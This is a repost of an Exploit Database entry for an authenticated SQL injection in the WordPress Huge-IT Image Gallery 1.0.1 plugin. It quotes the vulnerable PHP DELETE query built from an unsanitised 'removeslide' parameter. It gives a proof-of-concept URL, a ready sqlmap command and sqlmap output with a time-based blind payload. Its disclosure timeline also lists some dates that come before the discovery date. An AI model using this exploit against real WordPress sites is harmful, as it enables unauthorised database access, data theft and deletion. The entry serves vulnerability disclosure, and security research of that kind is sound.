WordPress Plugin Huge-IT Image Gallery 1.0.1 – (Authenticated) SQL Injection

• Exploit Database
• 14 阅读

• 作者： Claudio Viviani
  日期： 2014-09-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34524/

• ######################
  # Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
  
  # Exploit Author : Claudio Viviani
  
  # Vendor Homepage : http://huge-it.com/
  
  # Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
  Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
  
  # Date : 2014-08-25
  
  # Tested on : Windows 7 / Mozilla Firefox
  # Linux / Mozilla Firefox
  # Linux / sqlmap 1.0-dev-5b2ded0
  
  ######################
  
  # Location :
  http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
  
  ######################
  
  # Vulnerable code :
  
  function editgallery($id)
  {
  
  global $wpdb;
  
  if(isset($_GET["removeslide"])){
   if($_GET["removeslide"] != ''){
  
  
  $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_imagesWHERE id = ".$_GET["removeslide"]." ");
  
  
  
   }
   }
  
  ######################
  
  # PoC Exploit:
  
  http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2
  
  
  # Exploit Code via sqlmap:
  
  sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
  -p removeslide --dbms=mysql --level 3
  
  [20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
  ...
  ...
  ...
  ---
  Place: GET
  Parameter: removeslide
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0 time-based blind - Parameter replace
  Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
  ---
  
  
  # PoC Video:
  
  https://www.youtube.com/watch?v=gAmb0_o3ZUc
  
  ######################
  
  # Vulnerability Disclosure Timeline:
  
  2014-08-25:Discovered vulnerability
  2014-08-26:Vendor Notification (Web Customers Service Form)
  2014-08-26:No Response/Feedback 
  2014-08-01:Plugin version 1.0.1 released without fix 
  2014-08-02:Public Disclosure
   
  #####################
  
  Discovered By : Claudio Viviani
  http://www.homelab.it
  		
  info@homelab.it
  homelabit@protonmail.ch
  
  https://www.facebook.com/homelabit
  https://twitter.com/homelabit
  https://plus.google.com/+HomelabIt1/
  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  
  #####################